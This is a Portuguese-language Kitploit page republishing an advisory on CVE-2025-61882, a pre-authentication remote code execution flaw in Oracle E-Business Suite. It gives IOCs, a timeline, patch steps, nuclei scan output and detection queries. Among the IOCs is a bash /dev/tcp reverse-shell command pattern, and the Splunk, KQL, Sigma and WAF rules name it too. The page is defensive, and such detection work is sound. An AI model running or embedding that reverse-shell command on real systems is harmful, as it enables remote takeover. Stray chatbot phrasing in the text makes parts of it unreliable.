Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
Análise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoInteligência de AmeaçasResposta a Incidentes
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

Fornece um advisory detalhado sobre CVE-2025-61882 com análise técnica, IOCs, consultas de detecção e um template de exploit baseado em nuclei para RCE pré-autenticação no Oracle E-Business Suite.

Ver Repositório
2há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️🚨 CVE‑2025‑61882 — Execução Remota de Código Crítica Pré‑Autenticação no Oracle E‑Business Suite (EBS) 🚨🛡️

Resumo curto: Execução remota de código crítica pré‑autenticação no Oracle E‑Business Suite (EBS) — afeta 12.2.3 → 12.2.14, CVSS 9.8, explorada ativamente na natureza (atividade de ransomware/extorsão relatada). ([oracle.com][1])


📌 Fatos rápidos (tabela)

CampoDetalhes
🆔 CVECVE‑2025‑61882
🧾 Produto / ComponenteOracle E‑Business Suite (EBS) — integração Concurrent Processing / BI Publisher
📦 Versões afetadas12.2.3 → 12.2.14
🔢 CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ TipoExecução Remota de Código (RCE) — nenhuma autenticação necessária
🔥 Explorada na naturezaSim — campanhas de exploração em massa / extorsão relatadas
📅 Divulgação / cronogramaOutubro de 2025 (aviso do fornecedor + writeups públicos). ([oracle.com][1])

(Acima consolidado a partir do aviso do fornecedor, NVD/CISA e múltiplas análises de fornecedores.) ([oracle.com][1])


💥 Impacto (tabela)

Área de impactoO que significa
🔓 ConfidencialidadeAtacantes podem ler dados sensíveis de RH/finanças/ERP
🛠️ IntegridadeAtacantes podem modificar registros, criar backdoors ou alterar configurações
⚡ DisponibilidadeAtacantes podem interromper serviços, executar ransomware ou destruir backups
🧭 Nível de riscoExtremo — RCE pré‑autenticação em sistema ERP crítico → possível pivô total de domínio

Referências relatando exploração de alto impacto e vínculo com ransomware. ([Rapid7][2])


🛠️ Resumo técnico (conciso)

  • Vetor: Requisições HTTP/HTTPS para endpoints web expostos do EBS disparam uma cadeia de vulnerabilidades na integração Concurrent Processing / BI Publisher levando à execução remota de código. ([oracle.com][1])
  • Complexidade: Baixa (sem autenticação, sem interação do usuário). ([nvd.nist.gov][3])
  • Payloads observados: padrões de reverse shell, web shells, scripts descartados usados para exfiltração de dados e extorsão. ([Rapid7][2])

🕵️‍♀️ Indicadores de Comprometimento (IOCs) — exemplos (tabela)

Oracle e respondedores de incidentes publicaram IOCs; abaixo estão exemplos representativos relatados em avisos e writeups de fornecedores. Procure por esses padrões em logs e endpoints. ([oracle.com][1])

TipoExemplo
🌐 IPs (observados)200.107.207.26, 185.181.60.11 (endereços de exemplo relatados)
🧾 Padrão de comandosh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (reverse shell)
🗂️ Hashes de arquivosVários hashes SHA‑256 para scripts de exploração suspeitos (consulte o aviso do fornecedor para a lista completa)
🕳️ ArtefatosWeb shells inesperados, novos cronjobs, conexões de saída suspeitas para IPs/portas incomuns

Se você quiser a lista completa de IOCs (IPs, hashes completos, nomes de arquivos), posso colá-la aqui — diga "cole IOCs". (Sem links.)


🧭 Cronograma (compacto)

DataEvento
9 de ago de 2025Atividade de exploração no mundo real relatada mais cedo (telemetria do fornecedor). ([crowdstrike.com][4])
Início de out de 2025Oracle emitiu alerta de segurança / disponibilidade de patch para EBS. ([oracle.com][1])
6–7 de out de 2025CISA adicionou o CVE ao seu catálogo Known Exploited Vulnerabilities (KEV) (orientação para agências federais, prazo para mitigação). ([cisa.gov][5])
Out de 2025 (em andamento)Múltiplos writeups de fornecedores e relatos de exploração em massa (CrowdStrike, Rapid7, Tenable, etc.). ([crowdstrike.com][4])

✅ Ações recomendadas imediatas (tabela de etapas)

PrioridadeAçãoNotas / Especificidades de exemplo
1️⃣ CríticaAplicar patch nas instâncias EBS afetadasAplique os patches do Oracle Security Alert para as versões 12.2.3–12.2.14 imediatamente. ([oracle.com][1])
2️⃣ AltaIsolar / restringir acesso aos endpoints web do EBSBloqueie HTTP/HTTPS voltado à Internet para o EBS; permita apenas IPs de administração confiáveis ou VPN.
3️⃣ AltaHabilitar/ajustar regras de WAFImplante assinaturas de WAF de fornecedores/comunidade para os padrões de exploração; bloqueie payloads suspeitos. ([Rapid7][2])
4️⃣ AltaCaçar & detectarProcure em logs por comandos de reverse shell, gravações anormais de arquivos e conexões de saída para IOCs.
5️⃣ IncidenteConter & responder se comprometimento for encontradoIsole o host, preserve evidências forenses, altere credenciais, reconstrua a partir de backups limpos.
6️⃣ PolíticaReportar & notificarSe você estiver no escopo de requisitos regulatórios/contratuais, notifique stakeholders e autoridades conforme a política (orientação CISA/KEV pode se aplicar). ([nvd.nist.gov][3])

💀 Exploits :

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml                        

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 7
[INF] Running httpx on input host
[INF] Found 7 URL from httpx
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Mon, 02 Oct 2023 13:57:20 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sat, 31 Aug 2024 15:30:07 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Tue, 15 Aug 2023 16:58:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Fri, 30 Aug 2024 21:49:46 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sun, 16 May 2021 17:03:44 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http:/10.10.10.10:8000 ["Fri, 01 Sep 2023 13:20:35 GMT"]
[INF] Scan completed in 621.029991ms. 7 matches found.
CVE-2025-61882 Oracle E-Business Suite 1
CVE-2025-61882 Oracle E-Business Suite 4

🕵️‍♂️ Consultas de detecção de exemplo (prontas para copiar/colar)

Splunk (busca por padrão de reverse shell):

root@kitploit:~
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*") 
| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"
| table _time host src_ip user uri_path _raw

ELK / Kibana (KQL):

root@kitploit:~
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"

Regra Sigma (conceitual):

root@kitploit:~
title: Oracle EBS Reverse Shell via HTTP
detection:
  selection:
    EventID: 1234
    ProcessCommandLine|contains: "/dev/tcp/"
  condition: selection

(Ajuste os nomes dos campos ao seu esquema de logs; use IOCs para refinar.)


🔐 Mitigações de exemplo para firewall / WAF (exemplos)

  • ACL de rede: Bloqueie 80/443 de entrada para servidores EBS a partir da internet pública; permita apenas VPN de gerenciamento e IPs de administração específicos.
  • Regra de WAF (pseudo): Bloqueie requisições contendo bash -i, /dev/tcp/, base64 -d ou padrões típicos de payloads de exploração em corpos POST ou parâmetros de URL.
  • Rate limiting / geo‑bloqueio: Limite temporariamente a taxa de requisições para endpoints EBS e bloqueie tráfego de geografias maliciosas conhecidas se consistente com as necessidades do negócio.

🧾 Checklist de patch (rápido)

  1. Faça backups e snapshots de imagens de VM ✅
  2. Teste o patch em staging (se possível) ✅
  3. Aplique o patch do Oracle Security Alert no EBS 12.2.3–12.2.14 ✅ (siga as etapas do fornecedor: pare serviços, aplique o patch, execute tarefas pós‑instalação) ([oracle.com][1])
  4. Reinicie e valide a saúde do serviço ✅
  5. Re‑escaneie em busca de artefatos de comprometimento e execute verificações forenses completas do host ✅

🧠 Notas sobre ator de ameaça / exploração

  • Múltiplos fornecedores atribuem a exploração ativa a grupos ligados a extorsão/ransomware (por exemplo, Cl0p / Graceful Spider ou atores relacionados) — usada para roubo de dados e extorsão. A confiança na atribuição varia por fornecedor. ([crowdstrike.com][4])

📋 Para equipes de SOC / IR — checklist de playbook

  • Triagem: Tentativa de exploração de entrada? Capture a requisição HTTP, cabeçalhos, corpo POST.
  • Conter: Isole o host afetado da rede.
  • Forense: Colete memória, imagem de disco, logs do servidor web, logs de auditoria.
  • Remediar: Reconstrua o host a partir de imagem limpa se o comprometimento for confirmado.
  • Recuperação: Restaure a partir de backups conhecidos como bons; rotacione credenciais.
  • Reportar: Registre o incidente, notifique stakeholders, cumpra a orientação KEV/CISA se aplicável. ([nvd.nist.gov][3])

🔎 Fontes (lista curta de relatórios autoritativos)

(Listo fontes para precisão — não colarei links aqui, mas estes são os nomes de fornecedores/autoridades para que você possa referenciá-los se necessário.)

  • Oracle Security Alert / Disponibilidade de Patch (aviso do fornecedor). ([oracle.com][1])
  • NVD / CISA (entrada do catálogo CISA KEV e metadados do NVD). ([nvd.nist.gov][3])
  • Relatório técnico da CrowdStrike sobre campanhas. ([crowdstrike.com][4])
  • Análises e FAQs da Rapid7 / Tenable / outros fornecedores. ([Rapid7][2])

Aqui está um aviso profissional, rico em emojis que você pode usar para seu relatório do CVE‑2025‑61882:


⚠️💀 Aviso Legal 💀⚠️

As informações fornecidas neste relatório são apenas para fins de conscientização, defesa e educação. O uso destas informações para explorar, atacar ou comprometer qualquer sistema sem autorização explícita é ilegal e pode resultar em penalidades criminais e civis.

🔒 Sempre aplique os patches recomendados, siga as melhores práticas de segurança e realize testes apenas em ambientes controlados.

🧾 Este relatório não substitui avisos oficiais do fornecedor — sempre consulte os Oracle Security Alerts e orientações autorizadas para instruções definitivas de remediação.


Baixar ferramenta